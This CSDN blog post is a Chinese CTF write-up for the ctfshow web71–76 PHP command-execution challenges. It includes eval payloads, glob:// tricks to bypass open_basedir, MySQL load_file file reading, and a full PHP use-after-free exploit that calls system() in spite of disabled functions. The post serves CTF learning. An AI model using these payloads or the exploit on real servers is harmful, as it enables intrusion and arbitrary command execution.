CTFshow-命令执行(3)

最新推荐文章于 2024-06-30 15:08:39 发布
最新推荐文章于 2024-06-30 15:08:39 发布
阅读量151 收藏
点赞数
文章标签: php 开发语言 linux Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61376069/article/details/128666375
版权
文章讲述了CTFShowWeb系列挑战中涉及的文件包含漏洞利用,包括如何绕过open_basedir限制,使用glob协议进行目录扫描,以及在不同阶段如何找到并包含flag文件。还提到了利用PHP的var_export和PDO的MySQL功能来读取受限制的文件。
摘要由CSDN通过智能技术生成

ctfshow-web-71

先试试上一题的文件包含 post:c=include('/flag.txt');

结果是一堆问号,看一下他给的附件源码

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

ob_get_contents(); 获取缓冲区内容

ob_end_clean():删除内部缓冲区的内容,并且关闭内部缓冲区

可以在后面加一个exit()或者是die(),把后面的中断不执行.

post:c=include('/flag.txt');exit();

ctfshow-web-72

用文件包含flag.txt找不到这个文件,scandir扫一下目录,提示:

open_basedir的作用就是指定目录位置了,意思是将PHP 所能打开的文件限制在指定的目录树.

open_basedir可将用户访问文件的活动范围限制在指定的区域,

假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。

注意用open_basedir指定的限制实际上是前缀,而不是目录名。 举例来说: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/user1"都是 可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。例如设置成: "open_basedir = /dir/user/"

php open_basedir安全与使用详解

绕过open_basedir 可以用glob://伪协议.

c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo $f->__toString().'<br>';};exit();

浅谈绕过open_basedir 的几种用法

发现flag0.txt,用脚本打开,脚本需要url编码一下.

?><?php
pwn("cat /flag0.txt");
function pwn($cmd) {
    global $abc, $helper, $backtrace;
    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace(); # ;)
            if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
                $backtrace = debug_backtrace();
            }
        }
    }
    class Helper {
        public $a, $b, $c, $d;
    }
    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }
    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }
    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }
    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }
    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);
        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);
        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);
            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }
        if(!$data_addr || !$text_size || !$data_size)
            return false;
        return [$data_addr, $text_size, $data_size];
    }
    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;
            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;
            return $data_addr + $i * 8;
        }
    }
    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }
    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);
            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }
    function my_str_repeat($a,$b){
        $s = '';
        for($i = 0; $i <= $b;$i++){
            $s.=$a;
        }  
        return $s;
    }
    function trigger_uaf($arg) {
        # str_shuffle prevents opcache string interning
        $arg = str_shuffle(my_str_repeat('A', 79));
        $vuln = new Vuln();
        $vuln->a = $arg;
    }
    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }
    $n_alloc = 10; # increase this value if UAF fails
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle(my_str_repeat('A', 79));
    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];
    $helper = new Helper;
    $helper->b = function ($x) { };
    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }
    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;
    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);
    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);
    $closure_obj = str2ptr($abc, 0x20);
    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }
    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }
    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }
    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }
    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }
    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
    ($helper->b)($cmd);
    exit();
}
exit();

ctfshow-web-73

这一题再扫一下目录,发现没有open_basedir了,

那就换个扫描方法,var_export() 函数用于输出或返回一个变量,以字符串形式表示。

c=var_export(scandir('/'));exit();

发现了flagc.txt,用include包含

c=include ("/flagc.txt");exit();

ctfshow-web-74

ban了好多函数,还是用之前的glob协议

c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo $f->__toString().'<br>';};exit();

找到flagx.txt,再include包含

c=include ("/flagx.txt");exit();

ctfshow-web-75-76

接着用glob协议扫,扫出来后没法包含,因为open_basedir又加上了,之前的脚本也没用,

解法是 用mysql的load_file读取文件

payload:

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row){echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

c=
try {
    $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');
 
    foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
        echo ($row[0]) . "|";
    }
    $dbh = null;
} catch (PDOException $e) {
    echo $e->getMessage();
    exit(0);
}
exit(0);

南桥几经秋i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFSHOW(命令执行)【学习记录】
ximo的博客
01-27 2488
学习记录web29web30web31 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 对 flag 进行了过滤: 姿势学习: c=system('cat f*'); #正则表达式 c=
CTFshow web入门之命令执行总结
小白的博客
05-10 415
1、命令执行函数。
[CTFSHOW]命令执行
热门推荐
Y4tacker的博客
11-20 1万+
文章目录web 29web 30web 31web32web40参考文章 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 我这里只想到五种简便的方法: 通配符 payload1:c=syst
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3938
ctfshow 每周大挑战 极限命令执行 wp
ctfshow-web入门-命令执行(web71-web74)
最新发布
Welcome To Myon'Blog !
06-30 495
我们直接在执行完 include 包含语句后执行 exit 强制退出,从而实现绕过 preg_replace 的执行。拿到 flag:ctfshow{3deb8d00-68e6-4c20-a971-3fbf3382ec45}拿到 flag:ctfshow{8fccf5bc-5681-4815-b7ce-0b81772b6f7c}拿到 flag:ctfshow{35309fb4-36c5-4080-874a-6eaa85e03ff0}才发现这道题给了 index.php 的源码。
CTFSHOW 命令执行
asmartrman的博客
09-27 2250
ctfshow-web入门-命令执行板块(持续更新)
ctfshow每周大挑战之RCE极限挑战
qq_53058639的博客
02-02 920
这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。/值,可以查看到根目录有个f1agaaa文件,貌似是flag文件,如下图所示,参数_传system,参数0传cat /f*,打开得到falg。
ctfshow每周大挑战
Innocence_0的博客
02-04 924
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。如下图所示,POST传参时,参数名为code,后台对 “(”、“.” 做了替换。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
3. **执行命令**:将构建好的payload发送给目标服务器,从而实现命令执行。 #### Python脚本详解 下面是一个Python脚本的示例,用于帮助解决这个问题: ```python #-- coding:UTF-8 -- # Author:dota_st # Date:...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow 每周大挑战 RCE极限挑战3
Altering_Ji的博客
05-29 476
ctfshow 每周大挑战 RCE极限挑战3 payload有长度限制105,通过变量自增构造出POST,实现RCE
ctfshow 每周大挑战 极限命令运行
2301_81040377的博客
04-24 509
然后进行合理的手段只有01不难想到是二进制,然后我们再转换为刚才的八进制来执行命令。我们的目的是构造命令cat /flag。然后这里我们发现可以取反获得数字0 1。我们都可以直接执行8进制的了。没有通配符了,但是可以通过。是ascii字母的8进制值。现在直接用${##}替换1。先用脚本跑出这些东东能用。然后要找出1就能有答案了。跑完脚本发现这些可以用。的方式执行命令,其中。
CTFshow 命令执行 web73
Kradress的博客
12-06 381
目录源码思路题解总结 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been dis
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 2016
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
ctfshow-命令执行(web73-web77)
m0_72125469的博客
02-07 446
ctfshow web73 web74 web75 web76 web77
ctfshow-web入门72-74
m0_73303597的博客
01-09 571
自用
ctfshow-web-web红包题
07-14
如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值